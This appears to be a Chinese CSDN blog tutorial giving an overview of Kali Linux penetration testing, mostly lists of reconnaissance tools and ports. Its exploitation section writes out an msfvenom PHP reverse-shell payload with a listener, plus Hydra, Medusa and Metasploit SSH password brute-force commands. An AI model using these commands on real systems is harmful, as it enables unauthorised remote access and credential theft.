【渗透测试】

本文详细介绍了使用KaliLinux进行渗透测试的过程,包括信息搜集(端口扫描、目录扫描、CMS识别和资产收集)、漏洞利用(漏洞数据库、漏洞扫描、MSF反弹连接及密码爆破),为网络安全测试提供了实用的工具和技术指导。
摘要由CSDN通过智能技术生成


渗透测试流程:
在这里插入图片描述

一、kali信息搜集

1、端口扫描

常见的端口服务

http:80
https:443
ftp:21
ssh :22
mysql:3306
mssql:1433
rsync:873
oracle:1521
nginx:80
mongo:28017
redis:6379
tomcat:8080
smtp:25
POP3:110
dns:53
telent:23
vnc:5900
rdp:3389
weblogic:7001

工具:

Nmap
Nmap(网络映射器)是最常用的的工具之一。
Netcat
Advanced Port Scanner
Angry IP Scanner等等

2、目录扫描

1.组织一个词典(常见敏感的文件、目录)
2.拼接在网站根目录后面发起访问
如果响应是404不存在,如果是200存在

工具:

Burp Suitedirb
御剑
dirbuster

3、CMS系统指纹识别

常见CMS(Content Management System)

在这里插入图片描述

工具:

whatweb
CMSeeK
Wappalyzer
在线网站
御剑指纹扫描器
Test404轻量CMS指纹识别

4、资产收集工具

ARL灯塔
yakit
goby

二、kali漏洞利用

1、漏洞数据库

CVE (Common Vulnerabilities & Exposures )
https://cve.mitre.org/
https://www.cvedetails.com/
https://www.cnvd.org.cn/
https://nox.qianxin.com/vulnerability

POC/EXP

POC: Proof Of Concept
EXP: Exploit利用

POC/EXP工具集
01、

https://www.exploit-db.comgithub

02、

msf /usr/share/exploitdb/exploits/linux/local/(kali)

在这里插入图片描述

03、

pocsuite

2、漏洞扫描工具

商业漏洞扫描工具

Appscan
Nessus
OpenVAS

免费漏洞扫描工具

goby
Burp
https://github.com/k8gege/Ladon

国产商业漏洞扫描产品

在这里插入图片描述

3、msf反弹连接(metasploit framework)

01生成payload
msfvenom -p php/meterpreter/reverse_tcplhost=192.168.142.132 Iport=7777 -o shell.php

192.168.142.132:kali(控制着、攻击者)的IP
7777自定义的

02监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.142.132
set lport 7777
exploit

4、B P爆破web密码

抓包之后
在这里插入图片描述

先清空
在这里插入图片描述
选中所需 add
在这里插入图片描述
加载字典,开始爆破
在这里插入图片描述
可以点length或者status看看哪个的响应不一样
在这里插入图片描述

5、Hydra暴破Linux密码

**hydra -L username.txt -P password.txt 192.168.142.66 ssh**(字典)

medusa -M ssh -h 192.168.142.66 -u root -P password.txt
msfconsole

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.142.66
set PASS_FILE password.txt
set USER_FILE username.txt
exploit

  • 28
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值